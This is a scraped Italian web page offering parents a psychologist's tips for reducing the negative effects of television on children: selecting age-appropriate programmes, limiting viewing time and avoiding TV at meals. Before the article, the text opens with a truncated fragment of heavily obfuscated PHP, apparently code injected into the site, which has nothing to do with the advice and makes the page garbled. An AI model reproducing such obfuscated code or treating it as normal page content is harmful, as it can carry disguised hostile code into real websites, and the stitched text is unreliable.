=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) Come ridurre gli effetti negativi della TV sui vostri bambini

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.
Come ridurre gli effetti negativi della TV sui vostri bambini PDF 

ultima revisione dicembre 2013 - a cura di Valentina Ungaro, Psicologa

 

Ecco alcuni suggerimenti utili affinché i vostri bambini guardino soltanto TV di qualità, priva di scene violente, e vengano così a contatto con vicende e prospettive positive che portino ad un ampliamento delle loro conoscenze e dei loro orizzonti.

 

  • Selezionate quotidianamente e con attenzione i programmi televisivi adatti all’età del vostro bambino. Seguite sempre la programmazione che vi siete prefissati e non accendete mai casualmente la TV.
  • Ponete dei limiti di tempo da trascorrere davanti la TV (è consigliabile un tempo non superiore alle 2 ore al giorno). Non mettete il televisore nella camera dei bambini.
  • Guardate insieme a vostro figlio almeno uno dei suoi programmi televisivi, commentandolo; spiegategli quanto sta accadendo nel programma, cosa sia giusto e cosa sbagliato di una particolare scena e soprattutto aiutatelo a discernere tra realtà e finzione.
  • Spegnete subito, senza esitare, la TV qualora venga trasmesso un programma che non ritenete adatto al vostro bambino.
  • Evitate anche voi di guardare troppa TV in modo tale da non rappresentare un cattivo esempio per il vostro bambino.
  • Non usate la TV come baby-sitter.
  • Pianificate altre attività divertenti per il vostro bambino come l’andare al parco giochi, alle feste a casa di amici ecc; così vostro figlio potrà scegliere tra molte alternative interessanti e divertenti oltre la TV.
  • Non utilizzate la TV come ricompensa per una buona condotta.
  • Evitate di guardare la TV durante i pasti, anzi incentivate il dialogo e il confronto tra tutti i familiari durante questi momenti.
  • Incoraggiate vostro figlio a guardare programmi televisivi che evidenzino il senso e l’importanza dell’amicizia, dell’aiuto e della cooperazione.

 

Qualora non riusciste ad impostare correttamente limiti e regole efficaci per il vostro bambino, provate a contattate uno psicologo per un aiuto appropriato.

 

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito